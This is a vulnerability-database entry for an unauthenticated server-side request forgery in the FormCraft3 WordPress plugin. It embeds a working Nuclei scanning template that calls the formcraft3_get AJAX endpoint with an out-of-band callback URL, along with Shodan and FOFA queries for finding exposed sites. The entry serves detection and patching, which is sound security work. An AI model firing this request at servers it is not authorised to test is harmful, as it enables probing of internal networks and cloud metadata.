/Vulnerability Library

FormCraft3 <= 3.9.15 - Server-Side Request Forgery

CVE-2026-65442
Verified

Description

Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.

Severity

High

CVSS Score

7.2

Exploit Probability

0%

Affected Product

formcraft3

Published Date

August 3, 2026

Template Author

dhiyaneshdk

CVE-2026-65442.yaml
id: CVE-2026-65442

info:
  name: FormCraft3 <= 3.9.15 - Server-Side Request Forgery
  author: DhiyaneshDk
  severity: high
  description: |
    Unauthenticated Server Side Request Forgery (SSRF) in FormCraft <= 3.9.15 versions.
  impact: |
    An unauthenticated attacker can force the server to make HTTP requests to arbitrary internal or external URLs, potentially accessing cloud metadata services (AWS/GCP/Azure), internal network services, and sensitive data.
  remediation: |
    Update FormCraft3 to version 3.9.16 or later which adds nonce verification and authentication checks to the formcraft3_get AJAX endpoint.
  reference:
    - https://patchstack.com/database/wordpress/plugin/formcraft/vulnerability/wordpress-formcraft-plugin-3-9-15-server-side-request-forgery-ssrf-vulnerability
    - https://wpscan.com/vulnerability/a8ce5ff4-dd4c-411c-9b34-7824a75742b6/
    - https://github.com/advisories/GHSA-xvfc-pj4j-wr9x
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65442
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2026-65442
    epss-score: 0.00419
    epss-percentile: 0.35136
    cwe-id: CWE-918
    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: subtlewebinc
    product: formcraft3
    framework: wordpress
    fofa-query: body="formcraft3" && body="wp-"
    shodan-query: http.component:"wordpress" http.html:"formcraft3"
  tags: cve,cve2026,wp,wp-plugin,wordpress,formcraft3,ssrf,subtlewebinc,vkev,oast

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          - "/wp-content/plugins/formcraft3/"
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: WordPress"
# digest: 4a0a00473045022100e2284ce44bcaea2c4939d73c75264d02b6402e0d30ca7a30ce71fc1c7886553e02200b544d3415cffc898ce338cd5892b79bd5694c9313eb11e5fadb8e6814370533:922c64590222798bb761d5b6d8e72950
7.2Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CVE ID:
cve-2026-65442
CWE ID:
cwe-918

References

https://patchstack.com/database/wordpress/plugin/formcraft/vulnerability/wordpress-formcraft-plugin-3-9-15-server-side-request-forgery-ssrf-vulnerabilityhttps://wpscan.com/vulnerability/a8ce5ff4-dd4c-411c-9b34-7824a75742b6/https://github.com/advisories/GHSA-xvfc-pj4j-wr9xhttps://nvd.nist.gov/vuln/detail/CVE-2026-65442https://nvd.nist.gov/vuln/detail/CVE-2022-0591

Remediation Steps

Update FormCraft3 to version 3.9.16 or later which adds nonce verification and authentication checks to the formcraft3_get AJAX endpoint.